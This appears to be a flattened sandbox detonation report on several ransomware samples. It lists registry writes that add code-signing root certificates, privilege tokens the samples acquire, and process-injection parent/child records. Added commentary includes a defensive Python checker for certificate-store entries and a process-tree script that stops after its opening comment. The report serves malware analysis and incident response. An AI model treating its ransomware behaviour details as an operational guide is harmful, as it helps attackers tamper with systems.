\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Hortense - French (France)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\r1040sr.lxa" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "spell=NativeSupported; cardinal=GlobalSupported; ordinal=NativeSupported; date=GlobalSupported; time=GlobalSupported; telephone=NativeSupported; address=NativeSupported; message=NativeSupported; url=NativeSupported; currency=NativeSupported; alphanumeric=NativeSupported" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "{14E74C62-DC97-43B0-8F2F-581496A65D60}" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "1" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Stefan" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "SR fr-FR Locale Handler" SearchApp.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 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 y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53
f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc
1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 y_installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 y_installer.exe -
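The registry writes above show y_installer.exe adding two entries under HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates, keyed by SHA-1 thumbprint. Each Blob value is a sequence of CERT_*_PROP_ID records (uint32 property id, uint32 reserved field that is always 1, uint32 length, data): property 3 is the SHA-1 thumbprint, property 9 the enhanced key usage (here the code-signing OID 1.3.6.1.5.5.7.3.3), property 11 the UTF-16 friendly name (the 4EFC... entry decodes to "GlobalSign Code Signing Root R45"), and property 32 the DER certificate. When an installer touches the root store, the check a responder wants is that the key name, the stored thumbprint and the actual hash of the embedded certificate all agree. The parser below is an added example, not part of the sandbox report or of any Microsoft or vendor code. Its sample blob is constructed here from the property values visible on the page, with a five-byte stand-in in place of the real 1398-byte DER certificate, so the "actual hash" check is expected to fail for that entry and to pass for a second, self-consistent entry.

```python
"""Parse and sanity-check a SystemCertificates\\...\\Certificates\\<SHA1>\\Blob value.

Added example (not from the report). Record layout, as seen in the page's hex:
uint32 prop_id, uint32 reserved (always 1), uint32 length, then `length` bytes.
"""
import hashlib
import struct

# Property ids from wincrypt.h
CERT_SHA1_HASH_PROP_ID = 3
CERT_ENHKEY_USAGE_PROP_ID = 9
CERT_FRIENDLY_NAME_PROP_ID = 11
CERT_CERT_PROP_ID = 32

ID_KP_CODE_SIGNING = bytes.fromhex("06082b06010505070303")  # DER-encoded OID 1.3.6.1.5.5.7.3.3

# Values copied from the report's first Blob; the DER body is a constructed stand-in.
PAGE_KEY_NAME = "4EFC31460C619ECAE59C1BCE2C008036D94C84B8"
PAGE_EKU = bytes.fromhex("300a06082b06010505070303")
PAGE_FRIENDLY = "GlobalSign Code Signing Root R45"
STAND_IN_DER = bytes.fromhex("3003020101")  # SEQUENCE { INTEGER 1 }: placeholder, not the real certificate


def parse_blob(blob: bytes) -> dict:
    """Split a Blob into {prop_id: data}; raises ValueError on a truncated or malformed record."""
    props = {}
    off = 0
    while off < len(blob):
        if len(blob) - off < 12:
            raise ValueError(f"truncated property header at offset {off}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + length > len(blob):
            raise ValueError(f"malformed property {prop_id} at offset {off - 12}")
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def build_blob(props: dict) -> bytes:
    """Inverse of parse_blob; used here only to construct sample input."""
    return b"".join(struct.pack("<III", pid, 1, len(data)) + data for pid, data in props.items())


def check_authroot_entry(key_name: str, blob: bytes) -> dict:
    """Compare the key name against both the stored SHA-1 property and the real certificate hash."""
    props = parse_blob(blob)
    cert = props.get(CERT_CERT_PROP_ID, b"")
    stored_sha1 = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex()
    actual_sha1 = hashlib.sha1(cert).hexdigest()
    name = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le").rstrip("\x00")
    return {
        "friendly_name": name,
        "code_signing_eku": ID_KP_CODE_SIGNING in props.get(CERT_ENHKEY_USAGE_PROP_ID, b""),
        "stored_sha1_matches_key": stored_sha1 == key_name.lower(),
        "cert_sha1_matches_key": actual_sha1 == key_name.lower(),
        "der_starts_with_sequence": cert[:1] == b"\x30",
    }


def page_style_entry():
    """Blob with the page's property values but the stand-in certificate body."""
    blob = build_blob({
        CERT_SHA1_HASH_PROP_ID: bytes.fromhex(PAGE_KEY_NAME),
        CERT_ENHKEY_USAGE_PROP_ID: PAGE_EKU,
        CERT_FRIENDLY_NAME_PROP_ID: (PAGE_FRIENDLY + "\x00").encode("utf-16-le"),
        CERT_CERT_PROP_ID: STAND_IN_DER,
    })
    return PAGE_KEY_NAME, blob


def consistent_entry():
    """Same stand-in certificate, with key name and SHA-1 property derived from it."""
    sha1 = hashlib.sha1(STAND_IN_DER).hexdigest()
    blob = build_blob({CERT_SHA1_HASH_PROP_ID: bytes.fromhex(sha1), CERT_CERT_PROP_ID: STAND_IN_DER})
    return sha1.upper(), blob


if __name__ == "__main__":
    for key, blob in (page_style_entry(), consistent_entry()):
        print(key, check_authroot_entry(key, blob))
```

On a live system the same check runs over every subkey of the AuthRoot, Root and CA stores: read the Blob value, parse it, and flag entries whose computed SHA-1 differs from the key name or whose stored property 3 disagrees with either, since a consistent triple is what the OS itself writes and a mismatch points at a hand-crafted or tampered entry.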
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 1760 powershell.exe 1760 powershell.exe 1760 powershell.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3256 7zFM.exe 2004 taskmgr.exe 2316 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
pid Process 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 3256 7zFM.exe Token: 35 3256 7zFM.exe Token: SeSecurityPrivilege 3256 7zFM.exe Token: SeDebugPrivilege 2772 taskmgr.exe Token: SeSystemProfilePrivilege 2772 taskmgr.exe Token: SeCreateGlobalPrivilege 2772 taskmgr.exe Token: SeDebugPrivilege 2004 taskmgr.exe Token: SeSystemProfilePrivilege 2004 taskmgr.exe Token: SeCreateGlobalPrivilege 2004 taskmgr.exe Token: 33 2772 taskmgr.exe Token: SeIncBasePriorityPrivilege 2772 taskmgr.exe Token: SeDebugPrivilege 1760 powershell.exe Token: SeDebugPrivilege 3112 HEUR-Trojan-Ransom.MSIL.Blocker.gen-186d9afa5f922ed9b4cb93853bd15496aeaf37d212f479c049fbd74c40d0b8af.exe Token: SeShutdownPrivilege 1164 explorer.exe Token: SeCreatePagefilePrivilege 1164 explorer.exe Token: SeShutdownPrivilege 1164 explorer.exe Token: SeCreatePagefilePrivilege 1164 explorer.exe Token: SeDebugPrivilege 4200 Trojan-Ransom.Win32.Blocker.mvwo-8f4df1b11998017853ed5d0f009f461275cdd73f9c274d865fd11c36f6280118.exe Token: SeDebugPrivilege 3464 taskkill.exe Token: SeDebugPrivilege 3076 taskkill.exe Token: SeDebugPrivilege 1724 taskkill.exe Token: SeDebugPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeLoadDriverPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeCreateGlobalPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: 33 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeSecurityPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeTakeOwnershipPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeManageVolumePrivilege 4172 
UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeBackupPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeCreatePagefilePrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeShutdownPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeRestorePrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: 33 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeIncBasePriorityPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeDebugPrivilege 4000 Trojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exe Token: SeDebugPrivilege 4000 Trojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exe Token: SeManageVolumePrivilege 4200 svchost.exe Token: SeDebugPrivilege 1556 Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe Token: SeIncreaseQuotaPrivilege 5948 WMIC.exe Token: SeSecurityPrivilege 5948 WMIC.exe Token: SeTakeOwnershipPrivilege 5948 WMIC.exe Token: SeLoadDriverPrivilege 5948 WMIC.exe Token: SeSystemProfilePrivilege 5948 WMIC.exe Token: SeSystemtimePrivilege 5948 WMIC.exe Token: SeProfSingleProcessPrivilege 5948 WMIC.exe Token: SeIncBasePriorityPrivilege 5948 WMIC.exe Token: SeCreatePagefilePrivilege 5948 WMIC.exe Token: SeBackupPrivilege 5948 WMIC.exe Token: SeRestorePrivilege 5948 WMIC.exe Token: SeShutdownPrivilege 5948 WMIC.exe Token: SeDebugPrivilege 5948 WMIC.exe Token: SeSystemEnvironmentPrivilege 5948 WMIC.exe Token: SeRemoteShutdownPrivilege 
5948 WMIC.exe Token: SeUndockPrivilege 5948 WMIC.exe Token: SeManageVolumePrivilege 5948 WMIC.exe Token: 33 5948 WMIC.exe Token: 34 5948 WMIC.exe Token: 35 5948 WMIC.exe Token: 36 5948 WMIC.exe Token: SeIncreaseQuotaPrivilege 5948 WMIC.exe Token: SeSecurityPrivilege 5948 WMIC.exe Token: SeTakeOwnershipPrivilege 5948 WMIC.exe Token: SeLoadDriverPrivilege 5948 WMIC.exe Token: SeSystemProfilePrivilege 5948 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3256 7zFM.exe 3256 7zFM.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3672 Trojan-Ransom.Win32.Gimemo.besk-bcc15645592a6add5c91d3d097e63e8775b949be72de33fd7b06c5197c9a40fe.exe 5964 Fast.exe 5964 Fast.exe 4624 StartMenuExperienceHost.exe 5384 SearchApp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2772 wrote to memory of 2004 2772 taskmgr.exe 103 PID 2772 wrote to memory of 2004 2772 taskmgr.exe 103 PID 1760 wrote to memory of 5092 1760 powershell.exe 110 PID 1760 wrote to memory of 5092 1760 powershell.exe 110 PID 5092 wrote to memory of 2940 5092 cmd.exe 111 PID 5092 wrote to memory of 2940 5092 cmd.exe 111 PID 5092 wrote to memory of 2940 5092 cmd.exe 111 PID 5092 wrote to memory of 3112 5092 cmd.exe 112 PID 5092 wrote to memory of 3112 5092 cmd.exe 112 PID 5092 wrote to memory of 4432 5092 cmd.exe 113 PID 5092 wrote to memory of 4432 5092 cmd.exe 113 PID 5092 wrote to memory of 1740 5092 cmd.exe 114 PID 5092 wrote to memory of 1740 5092 cmd.exe 114 PID 5092 wrote to memory of 1740 5092 cmd.exe 114 PID 5092 wrote to memory of 648 5092 cmd.exe 115 PID 5092 wrote to memory of 648 5092 cmd.exe 115 PID 5092 wrote to memory of 648 5092 cmd.exe 115 PID 5092 wrote to memory of 4888 5092 cmd.exe 116 PID 5092 wrote to memory of 4888 5092 cmd.exe 116 PID 5092 wrote to memory of 2096 5092 cmd.exe 118 PID 5092 wrote to memory of 2096 5092 cmd.exe 118 PID 5092 wrote to memory of 2096 5092 cmd.exe 118 PID 5092 wrote to memory of 2352 5092 cmd.exe 119 PID 5092 wrote to memory of 2352 5092 cmd.exe 119 PID 5092 wrote to memory of 2352 5092 cmd.exe 119 PID 5092 wrote to memory of 1556 5092 cmd.exe 120 PID 5092 wrote to memory of 1556 5092 cmd.exe 120 PID 5092 wrote to memory of 1556 5092 cmd.exe 120 PID 5092 wrote to memory of 2076 5092 cmd.exe 121 PID 5092 wrote to memory of 2076 5092 cmd.exe 121 PID 5092 wrote to memory of 2076 5092 cmd.exe 121 PID 4888 wrote to memory of 1144 4888 HEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exe 125 PID 4888 wrote to memory of 1144 4888 HEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exe 125 PID 5092 wrote to memory of 4200 5092 cmd.exe 207 PID 5092 wrote to memory of 4200 5092 cmd.exe 207 PID 
5092 wrote to memory of 4200 5092 cmd.exe 207 PID 1144 wrote to memory of 3464 1144 cmd.exe 184 PID 1144 wrote to memory of 3464 1144 cmd.exe 184 PID 5092 wrote to memory of 32 5092 cmd.exe 130 PID 5092 wrote to memory of 32 5092 cmd.exe 130 PID 32 wrote to memory of 1472 32 Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe 131 PID 32 wrote to memory of 1472 32 Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe 131 PID 5092 wrote to memory of 5036 5092 cmd.exe 132 PID 5092 wrote to memory of 5036 5092 cmd.exe 132 PID 5092 wrote to memory of 5036 5092 cmd.exe 132 PID 4888 wrote to memory of 756 4888 HEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exe 133 PID 4888 wrote to memory of 756 4888 HEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exe 133 PID 5036 wrote to memory of 736 5036 Trojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exe 134 PID 5036 wrote to memory of 736 5036 Trojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exe 134 PID 5036 wrote to memory of 736 5036 Trojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exe 134 PID 1472 wrote to memory of 1396 1472 Enhancement 135 PID 1472 wrote to memory of 1396 1472 Enhancement 135 PID 32 wrote to memory of 2380 32 Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe 138 PID 32 wrote to memory of 2380 32 Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe 138 PID 756 wrote to memory of 3076 756 cmd.exe 139 PID 756 wrote to memory of 3076 756 cmd.exe 139 PID 5092 wrote to memory of 3672 5092 cmd.exe 141 PID 5092 wrote to memory of 3672 5092 cmd.exe 141 PID 5092 wrote to memory of 3672 
5092 cmd.exe 141 PID 2352 wrote to memory of 4244 2352 HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe 142 PID 2352 wrote to memory of 4244 2352 HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe 142 PID 2352 wrote to memory of 4244 2352 HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe 142 PID 2380 wrote to memory of 4644 2380 cmd.exe 143 PID 2380 wrote to memory of 4644 2380 cmd.exe 143 -
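The WriteProcessMemory table above is the report's record of who wrote into whom, and once the HTML table is flattened to text its columns (description, pid, Process, procid_target) run together as "PID <parent> wrote to memory of <child> <parent> <process name> <target index>", with one line per write, so every edge repeats, and with procid_target being the report's own process index rather than the child's PID. The script below is an added example, not part of the report or of the sandbox's tooling; it rebuilds the parent/child tree from a constructed excerpt of that table (entries copied from above) so that a single PID such as the taskkill.exe 3464 can be walked back to the powershell.exe root, and lists which dropped samples themselves wrote into other processes.

```python
"""Rebuild a process tree from a flattened 'Suspicious use of WriteProcessMemory' table.

Added example (not from the report). Only the writer's name is recorded per row,
so children that never write into anything are shown by PID alone.
"""
import re
from collections import defaultdict

# Constructed excerpt of the table above, as one run-on string the way it was extracted.
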